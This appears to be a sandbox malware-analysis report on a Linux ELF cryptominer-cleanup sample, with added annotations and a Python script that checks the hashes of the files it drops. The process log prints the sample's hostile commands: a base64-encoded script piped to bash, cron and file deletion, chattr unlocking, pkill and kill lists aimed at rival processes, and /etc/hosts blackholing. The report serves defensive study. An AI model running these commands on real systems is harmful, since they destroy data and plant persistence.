(These five lines add up to exactly 116 bytes, so they are the whole file. They are written by the grep -q "0.0.0.0 <name>" /etc/hosts || echo "0.0.0.0 <name>" >> /etc/hosts sequence in the decoded stage-two payload, which blackholes the hosts of competing campaigns.)

/tmp/.X11-unix/00
Process: /tmp/RCxcx0vm78.bin
File Type: ASCII text
Size (bytes): 6
Entropy (8bit): 2.2516291673878226
Encrypted: false
MD5: 9AD53470398219A6CBD816E8849E105C
SHA1: 8195222572074CAB80702FE3EBA7D24219B16616
SHA-256: 3541D19DDEC93F3E08A42ECF32A08E40FE52BE81E246528B77F760FCC1BD639F
SHA-512: 771DD55DF148EC1C6D6FAF68C801DE037705D2356E29DC1AF1F352350D814849A55EF904A9FCAD75CCEAF09781FCB4EF248A44EA24E7400CFC87BFE3F8B33431
Malicious: false
Reputation: low
Preview: 20790 (followed by a newline; this is the PID of the sample's second fork, written as a PID file into the hidden directory that stage one created)

/var/spool/cron/crontabs/tmp.pKGrnA
Process: /usr/bin/crontab
File Type: ASCII text
Size (bytes): 175
Entropy (8bit): 5.015323106207194
Encrypted: false
MD5: 6A0213DFD0F8E65B23ADFFA002692833
SHA1: 60419FF7AC94BFC1AF18B5AB776413C8C0427F43
SHA-256: D6CBD1184F0BF0FA89EF1CC04F81F0CD54211646761ADD5F62CAD10C27A5AE0A
SHA-512: BC6F8965DC8A52CDE4F04D46051140AF7C516E122843A0C4F4B2D8BF4E1F132C0FB45C1D4A74364AE2896B9938199DCE30873435197EF07EC1B8B71BDB3F2341
Malicious: true
Reputation: low
Preview (newlines rendered as "."):
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Thu Jan 2 20:30:37 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
(175 bytes is the length of this three-line header alone, so the crontab installed by crontab -l | grep -ivE ... | crontab - carried no job entries in this run: the cron persistence signature fires on the crontab rewrite itself, not on an added job.)
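The Preview column renders every newline as ".", which makes each dropped file look like a single line. Rebuilding the two small artefacts as bytes and recomputing their size and 8-bit entropy is a cheap check that the reconstruction is byte-exact, after which the hashes can be compared with the MD5/SHA values listed above. The code below is an added example and not part of the report: the two byte strings are reconstructed from the previews (labelled as such in the code), and sinkholed_names parses the /etc/hosts body the way an analyst would to list the names the sample blackholes.

```python
import hashlib
import math
from collections import Counter

# Reconstructed from the report's Preview fields, in which the viewer renders each newline
# as ".". Both are constructed here for the check; the report's Size/MD5 fields are the
# ground truth they are compared against.
HOSTS_DROP = (
    "0.0.0.0 aliyun.one\n"
    "0.0.0.0 lsd.systemten.org\n"
    "0.0.0.0 pastebin.com\n"
    "0.0.0.0 pm.cpuminerpool.com\n"
    "0.0.0.0 systemten.org\n"
).encode()
PIDFILE_DROP = b"20790\n"  # /tmp/.X11-unix/00: the PID of the sample's second fork


def shannon_entropy(data):
    """Shannon entropy in bits per byte (0.0 to 8.0), the report's 'Entropy (8bit)' figure."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data):
    """MD5/SHA-1/SHA-256 in the upper-case form the report prints."""
    return {name: hashlib.new(name, data).hexdigest().upper() for name in ("md5", "sha1", "sha256")}


def matches_report(data, size, entropy, tol=1e-3):
    """True if a reconstructed artefact has the size and entropy the report lists for it."""
    return len(data) == size and abs(shannon_entropy(data) - entropy) < tol


def sinkholed_names(hosts_bytes):
    """Names pinned to 0.0.0.0 in an /etc/hosts body (how this sample blocks rival hosts)."""
    names = []
    for line in hosts_bytes.decode("utf-8", "replace").splitlines():
        fields = line.split("#", 1)[0].split()  # drop comments, split on whitespace
        if len(fields) >= 2 and fields[0] == "0.0.0.0":
            names.extend(fields[1:])
    return names


if __name__ == "__main__":
    for label, data, size, ent in (
        ("/etc/hosts", HOSTS_DROP, 116, 3.9012421126820302),
        ("/tmp/.X11-unix/00", PIDFILE_DROP, 6, 2.2516291673878226),
    ):
        print(label, "size/entropy match:", matches_report(data, size, ent), digests(data)["md5"])
    print("sinkholed:", sinkholed_names(HOSTS_DROP))
```

A size match alone is weak evidence (any 116-byte reconstruction passes); size plus entropy pins down the byte histogram, and the MD5 comparison against the report then settles the exact ordering.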

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General
File type: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit): 7.91304870639992
TrID: ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: RCxcx0vm78.bin
File size: 23448
MD5: 885076641a9489ed1404c3c504b7303d
SHA1: 80102e6da770e1ebc3f1101e071a2483b55744c2
SHA256: e03a4dae8ef565cedd3ef4c4d27203153d70f68dfcac94e3b71c5459ab3de19f
SHA512: f3c67c5723fa3d0d24547854ee33112ceef908d318832a89ba69ef550ece7d13431c9f147de17f76ed5621a1ff2ca1d8928ad17d39efb6055c7583e91cdd395d
SSDEEP: 384:UiOlSGi9DUN1cj4J8UCkGISJAhkHNPOZp6uopnPl4dKonUxaVXALEMe9sPO1wJm0:bOgG5N2j4JMkGISJAKtP4pzkl4Brv9s7
File Content Preview: .ELF...... >...... H@.....@...... @.8...@...... @...... @.....YZ...... YZ...... `@...... ` @...... C ...... Q.td...... I..E.bss......

Static ELF Info

ELF header

Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
Machine: Advanced Micro Devices X86-64
Version Number: 0x1
Type: EXEC (Executable file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x4048b8
Flags: 0x0
ELF Header Size: 64
Program Header Offset: 64
Program Header Size: 56
Number of Program Headers: 3
Section Header Offset: 0
Section Header Size: 64
Number of Section Headers: 0
Header String Table Index: 0

Program Segments

Type       Offset  Virtual Address  Physical Address  File Size  Memory Size  Flags  Flags Description  Align     Prog Interpreter  Section Mappings
LOAD       0x0     0x400000         0x400000          0x5a59     0x5a59       0x5    R E                0x200000
LOAD       0x0     0x406000         0x406000          0x0        0x204318     0x6    RW                 0x1000
GNU_STACK  0x0     0x0              0x0               0x0        0x0          0x6    RW                 0x10

Network Behavior

UDP Packets

System Behavior

Analysis Process: RCxcx0vm78.bin PID: 20750 Parent PID: 20707

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: /tmp/RCxcx0vm78.bin File size: 0 bytes MD5 hash: unknown

File Activities

File Deleted

Analysis Process: RCxcx0vm78.bin PID: 20757 Parent PID: 20750

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: n/a File size: 0 bytes MD5 hash: unknown

Analysis Process: sh PID: 20757 Parent PID: 20750

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: sh -c "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;echo bHMgL3RtcC8uWDExLXVuaXggfHwgbWtkaXIgLXAgL3RtcC8uWDExLXVuaXgK|base64 -d|bash" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 20761 Parent PID: 20757

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: sh PID: 20762 Parent PID: 20757

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: base64 PID: 20762 Parent PID: 20757

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/base64 Arguments: base64 -d File size: 39664 bytes MD5 hash: 855d7e0819b22d9cfca26f75fbcdf4ed

File Activities

File Read

Analysis Process: sh PID: 20763 Parent PID: 20757

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: bash PID: 20763 Parent PID: 20757

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: bash File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

File Activities

File Read

Analysis Process: bash PID: 20776 Parent PID: 20763

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: ls PID: 20776 Parent PID: 20763

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/ls Arguments: ls /tmp/.X11-unix File size: 126584 bytes MD5 hash: f3b92d795c9ee0725c160680acd084d9

File Activities

File Read

Directory Enumerated

Analysis Process: bash PID: 20781 Parent PID: 20763

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: mkdir PID: 20781 Parent PID: 20763

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/mkdir Arguments: mkdir -p /tmp/.X11-unix File size: 76848 bytes MD5 hash: a97f666f21c85ec62ea47d022263ef41

File Activities

File Read

Directory Created

Analysis Process: RCxcx0vm78.bin PID: 20790 Parent PID: 20750

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: n/a File size: 0 bytes MD5 hash: unknown

File Activities

File Written

Analysis Process: RCxcx0vm78.bin PID: 20796 Parent PID: 20790

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: n/a File size: 0 bytes MD5 hash: unknown

Analysis Process: sh PID: 20796 Parent PID: 20790

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: sh -c "echo … |base64 -d|bash" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 20801 Parent PID: 20796

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: sh PID: 20802 Parent PID: 20796

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: base64 PID: 20802 Parent PID: 20796

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/base64 Arguments: base64 -d File size: 39664 bytes MD5 hash: 855d7e0819b22d9cfca26f75fbcdf4ed

File Activities

File Read

Analysis Process: sh PID: 20803 Parent PID: 20796

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: bash PID: 20803 Parent PID: 20796

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: bash File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

File Activities

File Read

File Written

Directory Enumerated

Analysis Process: bash PID: 20825 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: find PID: 20825 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/find Arguments: find /home/user/.ddg/* File size: 221768 bytes MD5 hash: e9b4574b80985a4dc1c451ee3146311d

File Activities

File Read

Analysis Process: bash PID: 20826 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: xargs PID: 20826 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs fuser -k File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

File Read

Directory Enumerated

Analysis Process: xargs PID: 20832 Parent PID: 20826

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

Directory Enumerated

Analysis Process: fuser PID: 20832 Parent PID: 20826

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/fuser Arguments: fuser -k File size: 36024 bytes MD5 hash: d2e863e32c9f969b17d78c175daadbae

File Activities

File Read

Analysis Process: bash PID: 20859 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

File Activities

Directory Enumerated

Analysis Process: find PID: 20859 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/find Arguments: find /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/crontab /etc/cron.weekly File size: 221768 bytes MD5 hash: e9b4574b80985a4dc1c451ee3146311d

File Activities

File Read

Directory Enumerated

Analysis Process: bash PID: 20860 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: xargs PID: 20860 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs chattr -i File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

File Read

Directory Enumerated

Analysis Process: xargs PID: 20876 Parent PID: 20860

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

Directory Enumerated

Analysis Process: chattr PID: 20876 Parent PID: 20860

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/chattr Arguments: chattr -i /etc/cron.d /etc/cron.d/popularity-contest /etc/cron.d/mdadm /etc/cron.d/php /etc/cron.d/.placeholder /etc/cron.d/anacron /etc/cron.daily /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/passwd /etc/cron.daily/popularity-contest /etc/cron.daily/0anacron /etc/cron.daily/bsdmainutils /etc/cron.daily/mdadm /etc/cron.daily/upstart /etc/cron.daily/mlocate /etc/cron.daily/.placeholder /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/logrotate /etc/cron.daily/dpkg /etc/cron.daily/apport /etc/cron.hourly /etc/cron.hourly/.placeholder /etc/cron.monthly /etc/cron.monthly/0anacron /etc/cron.monthly/.placeholder /etc/crontab /etc/cron.weekly /etc/cron.weekly/fstrim /etc/cron.weekly/man-db /etc/cron.weekly/0anacron /etc/cron.weekly/.placeholder /etc/cron.weekly/update-notifier-common File size: 10592 bytes MD5 hash: 8aa970e89963faf71434e3a37222cc49

File Activities

File Read

Analysis Process: bash PID: 20885 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

File Activities

Directory Enumerated

Analysis Process: find PID: 20885 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/find Arguments: find /var/spool/cron File size: 221768 bytes MD5 hash: e9b4574b80985a4dc1c451ee3146311d

File Activities

File Read

Directory Enumerated

Analysis Process: bash PID: 20886 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: xargs PID: 20886 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs chattr -i File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

File Read

Directory Enumerated

Analysis Process: xargs PID: 20904 Parent PID: 20886

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

Directory Enumerated

Analysis Process: chattr PID: 20904 Parent PID: 20886

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/chattr Arguments: chattr -i /var/spool/cron /var/spool/cron/crontabs /var/spool/cron/atjobs /var/spool/cron/atjobs/.SEQ /var/spool/cron/atspool File size: 10592 bytes MD5 hash: 8aa970e89963faf71434e3a37222cc49

File Activities

File Read

Analysis Process: bash PID: 20909 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: crontab PID: 20909 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/crontab Arguments: crontab -l File size: 36080 bytes MD5 hash: ff68fd30f0037fd7e9c1fdf5a035f739

File Activities

File Read

Analysis Process: bash PID: 20910 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 20910 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -ivE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11 File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 20911 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: crontab PID: 20911 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/crontab Arguments: crontab - File size: 36080 bytes MD5 hash: ff68fd30f0037fd7e9c1fdf5a035f739

File Activities

File Read

File Written

File Moved

Permission Modified

Analysis Process: bash PID: 20994 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

File Activities

Directory Enumerated

Analysis Process: grep PID: 20994 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -RE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11 /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Directory Enumerated

Analysis Process: bash PID: 20995 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: cut PID: 20995 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/cut Arguments: cut -f 1 -d : File size: 39728 bytes MD5 hash: af0cd4efc9e34a60050e61faac91842d

File Activities

File Read

Analysis Process: bash PID: 20996 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: xargs PID: 20996 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs rm -f File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

File Read

Directory Enumerated

Analysis Process: xargs PID: 21009 Parent PID: 20996

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

Directory Enumerated

Analysis Process: rm PID: 21009 Parent PID: 20996

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/rm Arguments: rm -f /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/cracklib-runtime /etc/cron.daily/mlocate /etc/cron.daily/mlocate /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/update-notifier-common File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f

File Activities

File Deleted

File Read

Analysis Process: bash PID: 21023 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: pkill PID: 21023 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/pkill Arguments: pkill -9 -f ./cron|./oka|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliYunDun|Donald|HT8s|Jonason|SzdXM|X13-unix|X17-unix|\\[stea\\]|aegis_|aliyun-service|azipl|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|java-c|kaudited|kerberods|khugepageds|kintegrityds|kpsmouseds|kswaped|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice amdicks|pastebin|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|systeamd|systemd-network|sysupdate|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0 File size: 5 bytes MD5 hash: f3b843351a404d4e8d4ce0ed0775fa9c

File Activities

File Read

Directory Enumerated

Analysis Process: bash PID: 21059 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: netstat PID: 21059 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/netstat Arguments: netstat -antp File size: 119624 bytes MD5 hash: 78d9a4b9c73de4d9fb0257c5588d67b1

File Activities

File Read

Directory Enumerated

Analysis Process: bash PID: 21060 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21060 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -E 103.3.62.64|104.140.201.102|104.140.201.42|104.140.201.58|104.140.201.62|104.140.244.186|107.191.99.221|107.191.99.95|119 .9.76.107|123.59.232.42|131.153.56.98|131.153.76.130|138.201.36.249|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101 .232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.73|139.99.120.75|139.9 9.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.1 39|149.202.42.174|1 .83.171|151.80.144.188|151.80.144.253|158.69.25.71|158.69.25.77|164.132.109.110|172.104.165.191|172.105.211.250|172.83.15 5.151:80|178.63.100.197|192.99.69.170|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|37.187.154.79|37.187.95. 110|37.59.43.131|37.59.43.136|37.59.44.193|37.59.44.93|37.59.45.174|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65. 223|47.101.30.124|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.2 55.34.118|51.25 9|51.255.34.80|5.196.13.29|5.196.23.240|5.196.26.96|54.37.7.208|61.155.221.74|66.42.105.146|79.137.82.5|88.99.193.240|88.99. 242.92|91.121.140.167|91.121.2.76|92.222.10.59|92.222.180.119|94.130.12.27|94.130.12.30|94.130.165.85|94.130.165.87|94.23.2 3.52|94.23.247.226 File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 21061 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: awk PID: 21061 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/awk Arguments: awk "{print $NF}" File size: 21 bytes MD5 hash: 1bb5d753c2edd5bae269563a5ec6d0fe

File Activities

File Read

Analysis Process: bash PID: 21062 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: cut PID: 21062 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/cut Arguments: cut -d/ -f1 File size: 39728 bytes MD5 hash: af0cd4efc9e34a60050e61faac91842d

File Activities

File Read

Analysis Process: bash PID: 21063 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: xargs PID: 21063 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs kill -9 File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

File Read

Directory Enumerated

Analysis Process: xargs PID: 21104 Parent PID: 21063

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c

File Activities

Directory Enumerated

Analysis Process: kill PID: 21104 Parent PID: 21063

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/kill Arguments: kill -9 File size: 23152 bytes MD5 hash: 5484331628ba283a0cda9730dafe47f8

File Activities

File Read

Analysis Process: bash PID: 21105 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: rm PID: 21105 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/rm Arguments: rm -f /home/user/.aliyun* /home/user/.systemd* /home/user/.tmp* /home/user/.trump* /home/user/.wget* /etc/cron.d/*aliyun* /etc/cron.d/*systemd* /etc/cron.d/*trump* /opt/*aliyun* /opt/*systemd* /opt/*trump* File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f

File Activities

File Deleted

File Read

Analysis Process: bash PID: 21106 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: cat PID: 21106 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/cat Arguments: cat /tmp/.X11-unix/01 File size: 52080 bytes MD5 hash: efa10d52f37361f2e3a5d22742f0fcc4

File Activities

File Read

Analysis Process: bash PID: 21107 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: cat PID: 21107 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/cat Arguments: cat /tmp/.X11-unix/0 File size: 52080 bytes MD5 hash: efa10d52f37361f2e3a5d22742f0fcc4

File Activities

File Read

Analysis Process: bash PID: 21108 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21108 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q trump /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 21109 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21109 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -q tor2w /etc/hosts File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427

File Activities

File Read

Analysis Process: bash PID: 21110 Parent PID: 20803

General

Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee

Analysis Process: grep PID: 21110 Parent PID: 20803

General

